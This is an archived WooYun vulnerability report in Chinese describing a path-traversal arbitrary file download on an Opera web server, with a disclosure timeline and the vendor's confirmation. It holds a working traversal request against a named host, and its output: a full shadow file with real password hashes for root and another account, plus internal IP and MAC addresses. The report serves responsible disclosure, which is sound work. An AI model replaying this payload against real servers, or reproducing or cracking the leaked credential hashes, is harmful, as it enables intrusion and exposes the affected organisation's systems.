乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-18: 细节已通知厂商并且等待厂商处理中 2015-06-18: 厂商已经确认,细节仅向厂商公开 2015-06-28: 细节向核心白帽子及相关领域专家公开 2015-07-08: 细节向普通白帽子公开 2015-07-18: 细节向实习白帽子公开 2015-08-02: 细节向公众公开
Opera某站点任意文件下载(内网root)
GET //../../../../../../../../proc/net/tcp HTTP/1.1Host: snow.opera.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4Accept: */*
下载/proc/net/tcp,得到本地IP为:790FC30A , 也即 10.195.15.121root用户,可读shadow:
root:$6$0yM1yOOM$Ds.HVDLdEiIZUTh3ueegwYKXRZzWjjJMjyJX1V1IVnreMxU5ZlZ2ZmqOBQhvzM8fss0uh.ghsTbMSRVN6jc8T1:16330:0:99999:7:::daemon:*:16330:0:99999:7:::bin:*:16330:0:99999:7:::sys:*:16330:0:99999:7:::sync:*:16330:0:99999:7:::games:*:16330:0:99999:7:::man:*:16330:0:99999:7:::lp:*:16330:0:99999:7:::mail:*:16330:0:99999:7:::news:*:16330:0:99999:7:::uucp:*:16330:0:99999:7:::proxy:*:16330:0:99999:7:::www-data:*:16330:0:99999:7:::backup:*:16330:0:99999:7:::list:*:16330:0:99999:7:::irc:*:16330:0:99999:7:::gnats:*:16330:0:99999:7:::nobody:*:16330:0:99999:7:::libuuid:!:16330:0:99999:7:::Debian-exim:!:16330:0:99999:7:::statd:*:16330:0:99999:7:::sshd:*:16330:0:99999:7:::opera:$6$.8D0ABfy$3KNvEEwol.Mjnu0xLj5u//uhqZEePCM6cmKq2pIRZyb3SBMig2j6IjX5SyzmqolFOVP9INqyNWllI987.8D3m.:16330:0:99999:7:::nagios:*:16330:0:99999:7:::puppet:*:16331:0:99999:7:::messagebus:*:16331:0:99999:7:::munin:*:16331:0:99999:7:::logcheck:*:16331:0:99999:7:::mysql:!:16331:0:99999:7:::tomcat6:*:16331:0:99999:7:::usmanw:!:16331:0:99999:7:::varnish:*:16331:0:99999:7:::varnishlog:*:16331:0:99999:7:::cosimo:!:16331:0:99999:7:::
/proc/net/arp IP address HW type Flags HW address Mask Device10.195.15.93 0x1 0x2 00:1f:a0:06:63:bc * eth010.195.15.78 0x1 0x2 52:54:00:a5:cb:5e * eth010.195.15.94 0x1 0x2 00:1f:a0:04:a3:fc * eth010.195.15.80 0x1 0x2 02:1f:a0:00:00:09 * eth010.195.15.65 0x1 0x2 00:10:db:ff:50:00 * eth010.195.15.81 0x1 0x2 02:1f:a0:00:00:09 * eth010.195.15.66 0x1 0x2 00:9c:02:a5:2f:0a * eth010.195.15.67 0x1 0x2 00:9c:02:a5:30:22 * eth0
过滤
危害等级:高
漏洞Rank:12
确认时间:2015-06-18 18:37
感谢报告,已经转给欧洲团队,他们正在处理。正在联系作者准备小礼品略表谢意。
暂无